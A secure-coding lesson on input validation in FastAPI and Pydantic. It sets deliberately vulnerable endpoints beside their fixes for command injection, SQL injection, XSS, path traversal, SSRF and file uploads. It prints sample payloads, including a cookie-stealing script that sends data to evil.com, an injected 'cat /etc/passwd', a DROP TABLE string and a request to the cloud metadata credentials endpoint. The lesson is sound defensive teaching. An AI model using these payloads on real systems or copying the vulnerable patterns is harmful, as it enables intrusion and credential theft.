Input Validation and Sanitization - Trust No Input

Before you read any further, study this FastAPI endpoint and predict what an attacker could do:

from fastapi import FastAPI, Query
import subprocess

app = FastAPI()

@app.get("/lookup")
async def dns_lookup(hostname: str = Query(...)):
    result = subprocess.run(
        f"nslookup {hostname}",
        shell=True,
        capture_output=True,
        text=True,
    )
    return {"output": result.stdout}

What happens when a user sends hostname=google.com; cat /etc/passwd? This is command injection, and it is one of at least six attack categories that input validation must prevent. By the end of this lesson, you will understand all of them and build validation layers that stop attacks before they reach your application logic.

What You Will Learn

  • Why input validation is a security boundary, not just a UX feature
  • How to use Pydantic field_validator and model_validator for security
  • How SQL injection works through string formatting (and why parameterized queries fix it)
  • How to prevent XSS (Cross-Site Scripting) with HTML escaping and Content Security Policy
  • How path traversal attacks bypass file access controls
  • How SSRF (Server-Side Request Forgery) turns your server into a proxy for attacks
  • Secure file upload validation patterns
  • How to build a complete validated form submission in FastAPI

Prerequisites

  • Pydantic models and validators (from Intermediate course)
  • FastAPI request handling (from Intermediate course)
  • Basic understanding of HTTP and HTML
  • pip install pydantic bleach python-magic (python-magic also requires the libmagic system library)

Part 1 - The Trust Boundary

Every piece of data that crosses a trust boundary - from user to server - is potentially malicious. This includes:

  • Query parameters, path parameters, request bodies
  • HTTP headers (including User-Agent, Referer, cookies)
  • File uploads (name, content, MIME type)
  • Data from databases (second-order injection)
  • Data from third-party APIs

The principle is simple: validate on input, encode on output.
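
A minimal sketch of that principle, using only the standard library. The names `validate_display_name` and `render_greeting` and the allowlist pattern are illustrative assumptions, not part of the lesson's codebase. The first function rejects unexpected input when data enters; the second escapes the value at the point it is written into HTML, even though it was already validated.

```python
import html
import re

# Hypothetical allowlist: letters, digits, spaces, apostrophes, hyphens (1-50 chars)
_NAME_RE = re.compile(r"[A-Za-z0-9 '\-]{1,50}")

def validate_display_name(raw: str) -> str:
    """Input side: reject anything outside the allowlist."""
    if not _NAME_RE.fullmatch(raw):
        raise ValueError("Invalid display name")
    return raw

def render_greeting(name: str) -> str:
    """Output side: escape for the HTML context, regardless of earlier validation."""
    return f"<p>Hello, {html.escape(name)}!</p>"

print(render_greeting(validate_display_name("O'Brien")))
# <p>Hello, O&#x27;Brien!</p>
```

The apostrophe is legitimate input, so validation accepts it, yet it still needs escaping when placed in HTML. That is why the two steps are kept separate.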

Part 2 - Pydantic Validators as Security Guards

field_validator for Individual Fields

import re
from pydantic import BaseModel, field_validator

class UserRegistration(BaseModel):
    username: str
    email: str
    bio: str

    @field_validator("username")
    @classmethod
    def validate_username(cls, v: str) -> str:
        # Length check
        if not 3 <= len(v) <= 30:
            raise ValueError("Username must be 3-30 characters")
        # Whitelist: only alphanumeric and underscores.
        # fullmatch is used because "$" with re.match also accepts a trailing newline.
        if not re.fullmatch(r"[a-zA-Z0-9_]+", v):
            raise ValueError("Username can only contain letters, numbers, underscores")
        # Reject reserved names
        if v.lower() in {"admin", "root", "system", "null", "undefined"}:
            raise ValueError("This username is reserved")
        return v.lower()  # Normalize to lowercase

    @field_validator("email")
    @classmethod
    def validate_email(cls, v: str) -> str:
        # Basic structural validation
        if not re.fullmatch(r"[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}", v):
            raise ValueError("Invalid email format")
        # Prevent email header injection
        if any(c in v for c in ["\r", "\n", "\x00"]):
            raise ValueError("Invalid characters in email")
        return v.lower()

    @field_validator("bio")
    @classmethod
    def validate_bio(cls, v: str) -> str:
        if len(v) > 500:
            raise ValueError("Bio must be 500 characters or fewer")
        # Strip null bytes (used in null byte injection)
        v = v.replace("\x00", "")
        return v

# Test it
try:
    user = UserRegistration(
        username="admin",
        email="admin@example.com",  # placeholder address so only the username fails
        bio="Hello",
    )
except ValueError as e:
    print(e)
# 1 validation error for UserRegistration
# username
#   Value error, This username is reserved

model_validator for Cross-Field Validation

from pydantic import BaseModel, model_validator

class PasswordChange(BaseModel):
    current_password: str
    new_password: str
    confirm_password: str

    @model_validator(mode="after")
    def validate_passwords(self):
        if self.new_password != self.confirm_password:
            raise ValueError("Passwords do not match")
        if self.new_password == self.current_password:
            raise ValueError("New password must differ from current password")
        if len(self.new_password) < 12:
            raise ValueError("Password must be at least 12 characters")
        return self

Constrained Types

Pydantic provides built-in constraints that eliminate entire classes of invalid input:

from pydantic import BaseModel, Field, constr, conint

class CourseQuery(BaseModel):
    # String with regex pattern and length limits
    # (the "" default is not validated; an explicitly supplied empty string is rejected)
    search: constr(
        min_length=1,
        max_length=100,
        pattern=r"^[a-zA-Z0-9\s\-]+$",
    ) = ""

    # Integer with strict bounds
    page: conint(ge=1, le=1000) = 1
    page_size: conint(ge=1, le=100) = 20

    # Enum-like restriction via a regex pattern (typing.Literal is an alternative)
    sort_by: str = Field(default="name", pattern=r"^(name|date|price)$")
    sort_order: str = Field(default="asc", pattern=r"^(asc|desc)$")

Tip

Prefer whitelisting (define what is allowed) over blacklisting (define what is blocked). Whitelists are finite and complete; blacklists are infinite and always incomplete. A regex like ^[a-zA-Z0-9_]+$ is a whitelist. A regex that tries to block <script> is a blacklist.
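
The difference can be seen in a small, standard-library-only sketch. Both filter functions below are hypothetical illustrations: the blocklist looks for one known-bad substring, while the allowlist accepts only the characters named in the tip's example regex.

```python
import re

def blocklist_filter(value: str) -> bool:
    """Naive blocklist: rejects only the exact lowercase '<script>' substring."""
    return "<script>" not in value

def allowlist_filter(value: str) -> bool:
    """Allowlist: accepts only letters, digits, and underscores."""
    return re.fullmatch(r"[a-zA-Z0-9_]+", value) is not None

payloads = [
    "<script>alert(1)</script>",     # caught by both
    "<SCRIPT>alert(1)</SCRIPT>",     # case variation slips past the blocklist
    "<img src=x onerror=alert(1)>",  # different tag slips past the blocklist
    "alice_01",                      # legitimate value
]
for p in payloads:
    print(f"{p!r}: blocklist={blocklist_filter(p)} allowlist={allowlist_filter(p)}")
```

Every new bypass requires another blocklist rule, whereas the allowlist rejects all three payloads without knowing about any of them.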

Part 3 - SQL Injection via String Formatting

SQL injection remains one of the most common and devastating vulnerabilities. It occurs when user input is concatenated into SQL strings:

# VULNERABLE - string concatenation
async def get_user(username: str, db):
    query = f"SELECT * FROM users WHERE username = '{username}'"
    result = await db.execute(query)
    return result.fetchone()

# Attack: username = "' OR '1'='1' --"
# Resulting SQL: SELECT * FROM users WHERE username = '' OR '1'='1' --'
# This matches ALL users in the database

# Attack: username = "'; DROP TABLE users; --"
# Resulting SQL: SELECT * FROM users WHERE username = ''; DROP TABLE users; --'
# This DELETES the entire users table (when the driver allows multiple statements per call)

# FIXED - parameterized query
from sqlalchemy import text

async def get_user(username: str, db):
    query = text("SELECT * FROM users WHERE username = :username")
    result = await db.execute(query, {"username": username})
    return result.fetchone()

# The database driver treats the parameter as a DATA value, never as SQL code
# Attack input "' OR '1'='1' --" is treated as the literal username string

Danger

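Never use f-strings, .format(), or % string formatting to put user-supplied values into SQL queries. Always pass values as bound parameters. This rule has zero exceptions. Where a query part cannot be a bound parameter (for example, a column name in ORDER BY), select it from a fixed whitelist in code instead of interpolating user input.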
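
The effect is easy to reproduce with the standard library's sqlite3 module. The sketch below is illustrative only: the in-memory table and its two rows are made up for the demonstration, and sqlite3 uses `?` placeholders rather than the `:username` style shown above.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, email TEXT)")
conn.executemany(
    "INSERT INTO users VALUES (?, ?)",
    [("alice", "alice@example.com"), ("bob", "bob@example.com")],
)

payload = "' OR '1'='1' --"

# Vulnerable: the payload becomes part of the SQL text
vulnerable_rows = conn.execute(
    f"SELECT username FROM users WHERE username = '{payload}'"
).fetchall()

# Parameterized: the payload is compared as a literal string value
safe_rows = conn.execute(
    "SELECT username FROM users WHERE username = ?", (payload,)
).fetchall()

print(len(vulnerable_rows), len(safe_rows))
# 2 0
```

The interpolated query returns every row, while the parameterized one returns none because no user is literally named `' OR '1'='1' --`.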

This topic is covered in full depth in Lesson 05 - SQL Injection Prevention. Here we focus on the validation layer that sits before the query layer.

import re
from pydantic import BaseModel, field_validator

class UserLookup(BaseModel):
    username: str

    @field_validator("username")
    @classmethod
    def validate_username(cls, v: str) -> str:
        # Defense in depth: validate BEFORE it reaches the query layer
        # (fullmatch rejects a trailing newline that "$" with re.match would accept)
        if not re.fullmatch(r"[a-zA-Z0-9_]{3,30}", v):
            raise ValueError("Invalid username format")
        return v

Part 4 - XSS Prevention (Cross-Site Scripting)

XSS occurs when an attacker injects JavaScript into a web page that is viewed by other users:

from fastapi.responses import HTMLResponse

# VULNERABLE - rendering user input as HTML without escaping
# (response_class=HTMLResponse is needed for FastAPI to serve the string as
# text/html; without it the string would be returned JSON-encoded)
@app.get("/profile/{username}", response_class=HTMLResponse)
async def profile(username: str, db):
    user = await db.get_user(username)
    return f"""
    <html>
    <body>
    <h1>Profile: {user.name}</h1>
    <p>Bio: {user.bio}</p>
    </body>
    </html>
    """

# If user.bio = '<script>document.location="https://evil.com/?c="+document.cookie</script>'
# The script executes in every visitor's browser, stealing their cookies

Fix 1: HTML Escaping

import html
from fastapi.responses import HTMLResponse

@app.get("/profile/{username}", response_class=HTMLResponse)
async def profile(username: str, db):
    user = await db.get_user(username)
    safe_name = html.escape(user.name)
    safe_bio = html.escape(user.bio)
    return f"""
    <html>
    <body>
    <h1>Profile: {safe_name}</h1>
    <p>Bio: {safe_bio}</p>
    </body>
    </html>
    """

# html.escape converts < to &lt; > to &gt; " to &quot; ' to &#x27; & to &amp;
# The script tag becomes visible text, not executable code

Fix 2: Sanitize Rich Text with bleach

When you need to allow some HTML (e.g., bold, italic) but block dangerous tags:

import bleach

ALLOWED_TAGS = ["b", "i", "em", "strong", "a", "p", "br", "ul", "ol", "li"]
ALLOWED_ATTRS = {"a": ["href", "title"]}
ALLOWED_PROTOCOLS = ["https"]

def sanitize_html(raw_html: str) -> str:
    """Allow safe HTML tags, strip everything else."""
    return bleach.clean(
        raw_html,
        tags=ALLOWED_TAGS,
        attributes=ALLOWED_ATTRS,
        protocols=ALLOWED_PROTOCOLS,
        strip=True,
    )

# Test
dirty = '<p>Hello <script>alert("xss")</script> <b>world</b></p>'
clean = sanitize_html(dirty)
print(clean)
# <p>Hello alert("xss") <b>world</b></p>
# The script tag is stripped (its contents remain as inert text), the b tag is preserved

Fix 3: Content Security Policy Header

CSP is a defense-in-depth header that tells the browser which sources of content are trusted:

from fastapi import FastAPI
from starlette.middleware.base import BaseHTTPMiddleware
from starlette.requests import Request

class CSPMiddleware(BaseHTTPMiddleware):
    async def dispatch(self, request: Request, call_next):
        response = await call_next(request)
        response.headers["Content-Security-Policy"] = (
            "default-src 'self'; "
            "script-src 'self'; "  # Only scripts from our domain
            "style-src 'self' 'unsafe-inline'; "
            "img-src 'self' https:; "
            "connect-src 'self' https://api.engineersofai.com; "
            "frame-ancestors 'none'; "  # Prevent clickjacking
            "base-uri 'self'; "
            "form-action 'self'"
        )
        return response

app = FastAPI()
app.add_middleware(CSPMiddleware)

Note

For API-only backends (JSON responses), XSS is less of a direct risk because browsers do not render JSON as HTML. However, if any endpoint returns HTML or if API responses are rendered in a frontend template, XSS is a real threat. Always escape output.

Part 5 - Path Traversal Attacks

Path traversal occurs when an attacker manipulates file paths to access files outside the intended directory:

# VULNERABLE - user controls the file path
@app.get("/files/{filename}")
async def get_file(filename: str):
    filepath = f"/app/uploads/{filename}"
    with open(filepath, "r") as f:
        return {"content": f.read()}

# Attack: filename = "../../etc/passwd"
# Resulting path: /app/uploads/../../etc/passwd = /etc/passwd
# The attacker reads the system password file

# Attack: filename = "....//....//etc/passwd"
# Some naive filters only strip "../" once, which turns this back into "../../etc/passwd"

# FIXED - reject separators, then resolve and verify containment
from pathlib import Path
from fastapi import HTTPException

UPLOAD_DIR = Path("/app/uploads").resolve()

@app.get("/files/{filename}")
async def get_file(filename: str):
    # Validate filename: no path separators, no special sequences
    if "/" in filename or "\\" in filename or ".." in filename:
        raise HTTPException(status_code=400, detail="Invalid filename")

    filepath = (UPLOAD_DIR / filename).resolve()

    # CRITICAL: Verify the resolved path is inside the upload directory
    # (Path.is_relative_to requires Python 3.9+)
    if not filepath.is_relative_to(UPLOAD_DIR):
        raise HTTPException(status_code=400, detail="Path traversal detected")

    if not filepath.is_file():
        raise HTTPException(status_code=404, detail="File not found")

    with open(filepath, "r") as f:
        return {"content": f.read()}

Pydantic Validator for Safe Filenames

import re
from pydantic import BaseModel, field_validator

class FileRequest(BaseModel):
    filename: str

    @field_validator("filename")
    @classmethod
    def validate_filename(cls, v: str) -> str:
        # Strip null bytes (path separators are rejected by the whitelist below)
        v = v.replace("\x00", "")

        # Whitelist: alphanumeric, hyphens, underscores, single dot for extension
        if not re.fullmatch(r"[a-zA-Z0-9_-]+\.[a-zA-Z0-9]+", v):
            raise ValueError(
                "Filename must be alphanumeric with a single extension"
            )

        # Block a sample of reserved Windows device names (the full list also
        # includes COM2-COM9 and LPT2-LPT9)
        basename = v.split(".")[0].lower()
        if basename in {"con", "prn", "aux", "nul", "com1", "lpt1"}:
            raise ValueError("Reserved filename")

        return v
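
The resolve-then-verify check from this part can be exercised without a web server. The sketch below is an illustration under assumptions: `resolve_inside` is a hypothetical helper name, and a temporary directory stands in for the upload directory. It also shows why stripping "../" once is not a defense.

```python
import tempfile
from pathlib import Path

def resolve_inside(base_dir: Path, user_path: str) -> Path:
    """Return the resolved path if it stays inside base_dir, else raise ValueError."""
    base = base_dir.resolve()
    candidate = (base / user_path).resolve()
    if not candidate.is_relative_to(base):  # Python 3.9+
        raise ValueError(f"Path escapes base directory: {user_path!r}")
    return candidate

# A filter that strips "../" once rebuilds the very sequence it tried to remove
naive = "....//....//etc/passwd".replace("../", "")
print(naive)  # ../../etc/passwd

with tempfile.TemporaryDirectory() as tmp:
    base = Path(tmp)
    (base / "report.txt").write_text("ok")
    print(resolve_inside(base, "report.txt").name)  # report.txt
    for attack in ["../../etc/passwd", naive]:
        try:
            resolve_inside(base, attack)
        except ValueError:
            print("rejected:", attack)
```

The containment check works on the final resolved path, so it does not matter how the attacker spelled the traversal.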

Part 6 - SSRF (Server-Side Request Forgery)

SSRF occurs when an attacker tricks your server into making requests to internal resources:

import httpx

# VULNERABLE - user controls the URL
@app.post("/fetch-url")
async def fetch_url(url: str):
    async with httpx.AsyncClient() as client:
        response = await client.get(url)
        return {"content": response.text}

# Attack: url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
# On AWS, this fetches the instance's IAM credentials from the metadata service

# Attack: url = "http://localhost:6379/INFO"
# This queries internal Redis, potentially exposing data

# Attack: url = "http://internal-admin-panel:8080/users"
# This accesses internal services not exposed to the internet

# FIXED - validate the scheme and the resolved IP before fetching
import ipaddress
from urllib.parse import urlparse
import socket
from fastapi import HTTPException
import httpx

BLOCKED_NETWORKS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
    ipaddress.ip_network("127.0.0.0/8"),
    ipaddress.ip_network("169.254.0.0/16"),  # Link-local, includes cloud metadata (169.254.169.254)
    ipaddress.ip_network("::1/128"),
]

ALLOWED_SCHEMES = {"https"}  # Only HTTPS

def validate_url(url: str) -> str:
    """Validate a URL is safe for server-side fetching."""
    parsed = urlparse(url)

    # Check scheme
    if parsed.scheme not in ALLOWED_SCHEMES:
        raise HTTPException(status_code=400, detail="Only HTTPS URLs allowed")

    # Check hostname is not empty
    if not parsed.hostname:
        raise HTTPException(status_code=400, detail="Invalid URL")

    # Resolve hostname to IP and check against blocked networks.
    # Note: gethostbyname returns a single IPv4 address and blocks the event loop.
    try:
        ip = ipaddress.ip_address(socket.gethostbyname(parsed.hostname))
    except (socket.gaierror, ValueError):
        raise HTTPException(status_code=400, detail="Cannot resolve hostname")

    for network in BLOCKED_NETWORKS:
        if ip in network:
            raise HTTPException(
                status_code=400,
                detail="URL resolves to a blocked network",
            )

    return url

@app.post("/fetch-url")
async def fetch_url(url: str):
    safe_url = validate_url(url)
    # Caveat: the HTTP client resolves the hostname again, so a DNS answer that
    # changes between the check and the request (DNS rebinding) can bypass it.
    async with httpx.AsyncClient(
        follow_redirects=False,  # Prevent redirect to internal services
        timeout=5.0,
    ) as client:
        response = await client.get(safe_url)
        return {"content": response.text[:10000]}  # Limit response size

Danger

SSRF is one of the most dangerous server-side vulnerabilities. On cloud infrastructure, it can expose cloud metadata credentials (AWS IAM, GCP service accounts) leading to complete cloud account takeover. Always validate URLs server-side and block private/internal IP ranges.
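
As an alternative to maintaining a list of blocked networks by hand, the standard library's ipaddress module can classify an address directly. The sketch below is one possible approach, not the lesson's implementation: `is_public_ip` is a hypothetical helper, and it is stricter than a hand-written list because it also rejects ranges such as unique-local IPv6 and carrier-grade NAT space.

```python
import ipaddress

def is_public_ip(value: str) -> bool:
    """Return True only for addresses the ipaddress module classifies as global."""
    ip = ipaddress.ip_address(value)
    # An IPv4-mapped IPv6 address (::ffff:a.b.c.d) is judged by its embedded IPv4 address
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return ip.is_global and not ip.is_multicast

for candidate in ["8.8.8.8", "127.0.0.1", "10.0.0.5", "169.254.169.254", "::1", "::ffff:127.0.0.1"]:
    print(candidate, is_public_ip(candidate))
```

This only classifies an address that has already been resolved; it does not by itself address redirects or DNS answers that change between the check and the request.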

Part 7 - File Upload Validation

File uploads require multiple layers of validation - the filename, MIME type, file content, and file size can all be vectors for attack:

import uuid
import magic  # python-magic
from pathlib import Path
from fastapi import FastAPI, UploadFile, HTTPException

app = FastAPI()

UPLOAD_DIR = Path("/app/uploads")
MAX_FILE_SIZE = 5 * 1024 * 1024  # 5 MB
ALLOWED_MIME_TYPES = {
    "image/jpeg",
    "image/png",
    "image/webp",
    "application/pdf",
}
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".webp", ".pdf"}

async def validate_upload(file: UploadFile) -> tuple[bytes, str]:
    """Validate an uploaded file for security."""

    # 1. Check filename
    if not file.filename:
        raise HTTPException(status_code=400, detail="No filename provided")

    ext = Path(file.filename).suffix.lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise HTTPException(
            status_code=400,
            detail=f"File extension '{ext}' not allowed",
        )

    # 2. Read content with size limit: read at most one byte past the limit,
    #    so an oversized upload is never loaded into memory in full
    content = await file.read(MAX_FILE_SIZE + 1)
    if len(content) > MAX_FILE_SIZE:
        raise HTTPException(
            status_code=400,
            detail=f"File exceeds {MAX_FILE_SIZE // 1024 // 1024}MB limit",
        )

    if len(content) == 0:
        raise HTTPException(status_code=400, detail="Empty file")

    # 3. Detect actual MIME type from file content (not from the header)
    detected_mime = magic.from_buffer(content, mime=True)
    if detected_mime not in ALLOWED_MIME_TYPES:
        raise HTTPException(
            status_code=400,
            detail=f"Detected file type '{detected_mime}' not allowed",
        )

    # 4. Verify extension matches detected type
    mime_extension_map = {
        "image/jpeg": {".jpg", ".jpeg"},
        "image/png": {".png"},
        "image/webp": {".webp"},
        "application/pdf": {".pdf"},
    }
    expected_extensions = mime_extension_map.get(detected_mime, set())
    if ext not in expected_extensions:
        raise HTTPException(
            status_code=400,
            detail="File extension does not match detected content type",
        )

    return content, detected_mime

@app.post("/upload")
async def upload_file(file: UploadFile):
    content, mime_type = await validate_upload(file)

    # Generate a random filename to prevent path traversal and overwrites
    safe_filename = f"{uuid.uuid4()}{Path(file.filename).suffix.lower()}"
    filepath = UPLOAD_DIR / safe_filename

    with open(filepath, "wb") as f:
        f.write(content)

    return {
        "filename": safe_filename,
        "size": len(content),
        "type": mime_type,
    }

Tip

Never trust the Content-Type header or the file extension provided by the client. Both can be spoofed. Always detect the actual file type from the file's content using a library like python-magic, which inspects the file's magic bytes (header signature).
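
To make "magic bytes" concrete, here is a deliberately simplified, standard-library-only sketch of signature sniffing. It is not how python-magic is implemented (libmagic uses a much larger rule database), and `sniff_mime` and `SIGNATURES` are hypothetical names; it only compares the first bytes of the content against three well-known file signatures.

```python
from typing import Optional

# Leading byte signatures for a few formats
SIGNATURES = {
    "image/png": b"\x89PNG\r\n\x1a\n",
    "image/jpeg": b"\xff\xd8\xff",
    "application/pdf": b"%PDF-",
}

def sniff_mime(content: bytes) -> Optional[str]:
    """Return the MIME type whose signature prefixes the content, or None."""
    for mime, signature in SIGNATURES.items():
        if content.startswith(signature):
            return mime
    return None

# A PHP script uploaded as "avatar.png" with Content-Type: image/png
fake_png = b"<?php system($_GET['cmd']); ?>"
real_png_header = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

print(sniff_mime(fake_png))         # None
print(sniff_mime(real_png_header))  # image/png
```

A matching prefix shows only that the file starts like the claimed format, not that it is well formed or harmless, so this check complements the other layers and does not replace them.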

Part 8 - Command Injection Prevention

Returning to the opening puzzle, command injection occurs when user input is passed to a shell command:

import subprocess

# VULNERABLE - shell=True with user input
@app.get("/lookup")
async def dns_lookup(hostname: str):
    result = subprocess.run(
        f"nslookup {hostname}",
        shell=True,  # <-- The root cause
        capture_output=True,
        text=True,
    )
    return {"output": result.stdout}

# Attack: hostname = "google.com; cat /etc/passwd"
# The shell interprets the ; as a command separator

import subprocess
import re
from fastapi import HTTPException

# FIXED - validate input AND avoid shell=True
@app.get("/lookup")
async def dns_lookup(hostname: str):
    # Strict hostname validation (the leading alphanumeric also blocks
    # values starting with "-", which nslookup would read as options)
    if not re.fullmatch(r"[a-zA-Z0-9]([a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?(\.[a-zA-Z]{2,})+", hostname):
        raise HTTPException(status_code=400, detail="Invalid hostname format")

    result = subprocess.run(
        ["nslookup", hostname],  # List form - no shell interpretation
        capture_output=True,
        text=True,
        timeout=5,
    )
    return {"output": result.stdout}

Danger

Never use shell=True with user-controlled input. Pass commands as a list to subprocess.run(), which bypasses the shell entirely. Each element in the list is treated as a literal argument, not parsed for shell metacharacters like ;, |, &&, or backticks.
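
The list-form behavior can be observed directly. In this sketch, which is an illustration and not part of the lesson's endpoint, a child Python process stands in for nslookup so the example runs on any machine; it prints how many arguments it received and the first one verbatim.

```python
import subprocess
import sys

payload = "google.com; echo INJECTED"

# The child prints its argument count, then the first argument exactly as received
child_code = "import sys; print(len(sys.argv) - 1); print(sys.argv[1])"

result = subprocess.run(
    [sys.executable, "-c", child_code, payload],  # list form, no shell involved
    capture_output=True,
    text=True,
    timeout=10,
)
print(result.stdout)
# 1
# google.com; echo INJECTED
```

The semicolon arrives as an ordinary character inside a single argument, so no second command is ever run.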

Part 9 - Real-World: Validated Form Submission in FastAPI

Putting it all together: a complete course submission form with comprehensive input validation.

import re
import html
from decimal import Decimal
from enum import Enum
from typing import Annotated
from urllib.parse import urlparse

from pydantic import BaseModel, Field, field_validator, model_validator
from fastapi import FastAPI

app = FastAPI()

class CourseLevel(str, Enum):
    beginner = "beginner"
    intermediate = "intermediate"
    advanced = "advanced"

class CourseSubmission(BaseModel):
    title: Annotated[str, Field(min_length=5, max_length=200)]
    description: Annotated[str, Field(min_length=20, max_length=5000)]
    level: CourseLevel
    price: Annotated[Decimal, Field(ge=0, le=Decimal("999.99"))]
    tags: list[str] = Field(default_factory=list, max_length=10)
    external_url: str | None = None

    @field_validator("title")
    @classmethod
    def validate_title(cls, v: str) -> str:
        # Remove null bytes
        v = v.replace("\x00", "")
        # Whitelist: word characters, whitespace, and basic punctuation
        if not re.fullmatch(r"[\w\s\-:,.'!?()]+", v):
            raise ValueError("Title contains invalid characters")
        # Normalize whitespace
        v = " ".join(v.split())
        return v

    @field_validator("description")
    @classmethod
    def validate_description(cls, v: str) -> str:
        v = v.replace("\x00", "")
        # Escape HTML to prevent stored XSS
        v = html.escape(v)
        return v

    @field_validator("tags")
    @classmethod
    def validate_tags(cls, v: list[str]) -> list[str]:
        validated = []
        for tag in v:
            tag = tag.strip().lower()
            if not re.fullmatch(r"[a-z0-9\-]{2,30}", tag):
                raise ValueError(f"Invalid tag format: '{tag}'")
            validated.append(tag)
        # Remove duplicates while preserving order
        return list(dict.fromkeys(validated))

    @field_validator("external_url")
    @classmethod
    def validate_external_url(cls, v: str | None) -> str | None:
        if v is None:
            return v
        parsed = urlparse(v)
        if parsed.scheme not in ("https",):
            raise ValueError("Only HTTPS URLs are allowed")
        if not parsed.hostname:
            raise ValueError("Invalid URL")
        # Block obvious internal hostnames. This is only a cheap first filter:
        # if the server ever fetches this URL, run the resolve-and-check
        # validation from Part 6 first.
        blocked = {"localhost", "127.0.0.1", "0.0.0.0", "internal"}
        if parsed.hostname in blocked:
            raise ValueError("Internal URLs are not allowed")
        return v

    @model_validator(mode="after")
    def validate_price_for_level(self):
        if self.level == CourseLevel.beginner and self.price > 0:
            raise ValueError("Beginner courses must be free")
        return self

@app.post("/api/courses")
async def create_course(course: CourseSubmission):
    # At this point, all inputs have passed validation. Queries must still be
    # parameterized and output must still be escaped downstream.
    return {"message": "Course created", "title": course.title}

Key Takeaways

  • Trust no input: every piece of data from outside your application is potentially malicious
  • Use Pydantic field_validator and model_validator as the first line of defense
  • Prefer whitelisting (allow known-good patterns) over blacklisting (block known-bad patterns)
  • Never build SQL queries with string concatenation; always use parameterized queries
  • Prevent XSS with HTML escaping (html.escape), sanitization (bleach), and CSP headers
  • Prevent path traversal by resolving paths and verifying they stay inside the intended directory
  • Prevent SSRF by validating URLs and blocking private IP ranges before making server-side requests
  • Prevent command injection by using subprocess.run() with a list of arguments, never shell=True
  • Validate file uploads by checking content type (magic bytes), not just the extension or header
  • Defense in depth: validate at the boundary (Pydantic), parameterize queries, escape output

Graded Practice Challenges

Level 1 - Identify the Vulnerability

Question 1: What attack does this code enable?

@app.get("/search")
async def search(q: str, db):
    results = await db.execute(f"SELECT * FROM courses WHERE title LIKE '%{q}%'")
    return results.fetchall()

Answer

SQL injection. The query parameter q is interpolated directly into the SQL string. An attacker can send q = %' UNION SELECT username, password_hash FROM users -- to extract the users table (the UNION must match the column count of courses, which an attacker can find by trial and error). Fix: use a parameterized query: text("SELECT * FROM courses WHERE title LIKE :q") with {"q": f"%{q}%"}.

Question 2: A developer validates file uploads by checking file.content_type == "image/png". Why is this insufficient?

Answer

The content_type is set by the client in the HTTP request header. An attacker can upload a PHP webshell or an executable file while setting the Content-Type header to image/png. The server accepts it as a "PNG" without inspecting the actual content. Always detect the MIME type from the file's content using a library like python-magic, which reads the magic bytes.

Question 3: What is the vulnerability in this URL validation?

def is_safe_url(url: str) -> bool:
    return not url.startswith("http://localhost")

Answer

Multiple bypasses: (1) http://127.0.0.1 is the same as localhost but passes the check. (2) http://[::1] (IPv6 loopback) passes. (3) http://0x7f000001 (hex IP) may resolve to 127.0.0.1. (4) http://localHOST (case variation) passes. (5) http://evil.com could redirect to localhost. Always resolve the hostname to an IP address and check it against blocked network ranges, not string patterns.
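
The first four bypasses can be checked offline. The sketch below is illustrative: `host_is_loopback` is a hypothetical helper that only decodes literal hosts (it performs no DNS lookup, so it is not a complete SSRF defense), and `is_safe_url` is the flawed function from the question.

```python
import ipaddress
from urllib.parse import urlparse

def is_safe_url(url: str) -> bool:
    """The flawed string-prefix check from the question."""
    return not url.startswith("http://localhost")

def host_is_loopback(url: str) -> bool:
    """Decode the host the way a resolver might and test for loopback."""
    host = urlparse(url).hostname or ""  # urlparse lowercases the hostname
    if host == "localhost":
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        try:
            # Integer spellings such as 0x7f000001 or 2130706433
            ip = ipaddress.ip_address(int(host, 0))
        except ValueError:
            return False
    return ip.is_loopback

bypasses = [
    "http://127.0.0.1/",
    "http://[::1]/",
    "http://0x7f000001/",
    "http://localHOST/",
]
for url in bypasses:
    print(url, "passes string check:", is_safe_url(url), "| loopback:", host_is_loopback(url))
```

Each URL passes the string check while pointing at the loopback interface, which is why the comparison has to happen on the decoded address and not on the URL text.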

Level 2 - Fix the Vulnerability

This user profile update endpoint has multiple security issues. Fix all of them:

@app.put("/profile")
async def update_profile(
    name: str,
    website: str,
    avatar_url: str,
    bio: str,
    db,
):
    await db.execute(
        f"UPDATE users SET name='{name}', website='{website}', "
        f"avatar_url='{avatar_url}', bio='{bio}' "
        f"WHERE id={current_user.id}"
    )
    return {"name": name, "bio": bio}

Solution

from pydantic import BaseModel, Field, field_validator, HttpUrl
from sqlalchemy import text
import html
import re

class ProfileUpdate(BaseModel):
    name: str = Field(min_length=1, max_length=100)
    website: HttpUrl | None = None
    avatar_url: HttpUrl | None = None
    bio: str = Field(max_length=1000, default="")

    @field_validator("name")
    @classmethod
    def validate_name(cls, v: str) -> str:
        v = v.replace("\x00", "")
        # fullmatch rejects a trailing newline that "$" with re.match would accept
        if not re.fullmatch(r"[\w\s\-'.]+", v):
            raise ValueError("Name contains invalid characters")
        return " ".join(v.split())  # Normalize whitespace

    @field_validator("bio")
    @classmethod
    def sanitize_bio(cls, v: str) -> str:
        return html.escape(v.replace("\x00", ""))

    @field_validator("website", "avatar_url")
    @classmethod
    def validate_urls(cls, v):
        # HttpUrl already restricts the scheme to http/https; reject plain http
        if v is not None and str(v).startswith("http://"):
            raise ValueError("Only HTTPS URLs are allowed")
        return v

@app.put("/profile")
async def update_profile(profile: ProfileUpdate, db):
    # current_user is assumed to come from the application's auth layer,
    # as in the original endpoint
    await db.execute(
        text(
            "UPDATE users SET name=:name, website=:website, "
            "avatar_url=:avatar_url, bio=:bio WHERE id=:user_id"
        ),
        {
            "name": profile.name,
            "website": str(profile.website) if profile.website else None,
            "avatar_url": str(profile.avatar_url) if profile.avatar_url else None,
            "bio": profile.bio,
            "user_id": current_user.id,
        },
    )
    return {"name": profile.name, "bio": profile.bio}

Fixes: (1) Pydantic model for structured validation. (2) Parameterized SQL. (3) HTML escaping on bio. (4) URL validation with HTTPS enforcement. (5) Length limits. (6) Null byte removal. (7) Name character whitelist.

